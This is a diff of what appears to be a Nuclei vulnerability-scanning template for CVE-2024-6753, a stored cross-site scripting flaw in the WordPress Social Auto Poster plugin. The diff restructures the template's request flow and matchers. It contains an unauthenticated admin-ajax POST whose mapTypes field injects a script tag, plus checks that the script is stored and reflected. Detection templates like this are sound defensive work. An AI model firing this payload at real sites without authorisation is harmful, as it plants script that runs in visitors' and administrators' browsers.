1111 remediation : |
1212 Update to the latest version of the plugin where the vulnerability is fixed.
1313 reference :
14- - https://nvd.nist.gov/vuln/detail/CVE-2024-6753
1514 - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2
1615 - https://patchstack.com/database/vulnerability/social-auto-poster/wordpress-social-auto-poster-plugin-5-3-14-unauthenticated-stored-cross-site-scripting-vulnerability
16+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6753
1717 classification :
1818 cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
1919 cvss-score : 7.2
@@ -28,44 +28,44 @@ info:
2828 fofa-query : body="social-auto-poster"
2929 tags : cve,cve2024,wordpress,wp,wp-plugin,social-auto-poster,xss,vkev
3030
31- flow : http(1) && http(2) && http(3) && http(4)
31+ flow : ( http(1) && http(2)) || ( http(3) && http(4) )
3232
3333http :
3434 - raw :
3535 - |
36- POST /wp-admin/admin-ajax.php HTTP/1.1
36+ GET / HTTP/1.1
3737 Host: {{Hostname}}
38- Content-Type: application/x-www-form-urlencoded
39- X-Requested-With: XMLHttpRequest
40-
41- action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
4238
4339 matchers :
4440 - type : dsl
4541 dsl :
42+ - ' contains(body, "/wp-content/plugins/")'
4643 - ' status_code == 200'
47- - ' contains(body, "\"status\":\"success\"")'
4844 condition : and
4945 internal : true
5046
5147 - raw :
5248 - |
53- GET /wp-login .php HTTP/1.1
49+ POST /wp-admin/admin-ajax .php HTTP/1.1
5450 Host: {{Hostname}}
51+ Content-Type: application/x-www-form-urlencoded
52+
53+ action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
5554
5655 matchers :
5756 - type : dsl
5857 dsl :
58+ - ' contains(body, "{\"status\":\"success\"}")'
59+ - ' contains(content_type, "text/html")'
5960 - ' status_code == 200'
60- - ' contains(header, "wordpress_test_cookie")'
6161 condition : and
62- internal : true
6362
6463 - raw :
6564 - |
6665 POST /wp-login.php HTTP/1.1
6766 Host: {{Hostname}}
6867 Content-Type: application/x-www-form-urlencoded
68+ Cookie: wordpress_test_cookie=WP+Cookie+check
6969
7070 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
7171
8888 - ' contains(body, "<script>alert(document.domain)</script>")'
8989 - ' contains(content_type, "text/html")'
9090 - ' status_code == 200'
91- condition : and
92- # digest: 4b0a00483046022100c6aa05f7b3bf88b27f989ca835570d53b04d3a1c40d557b186fd25f253840aea022100ffb63d8fa3f4c8199170034adad3ebd1d4d819e583fc2fcd7f4e26894cd829ac:922c64590222798bb761d5b6d8e72950
91+ condition : and
0 commit comments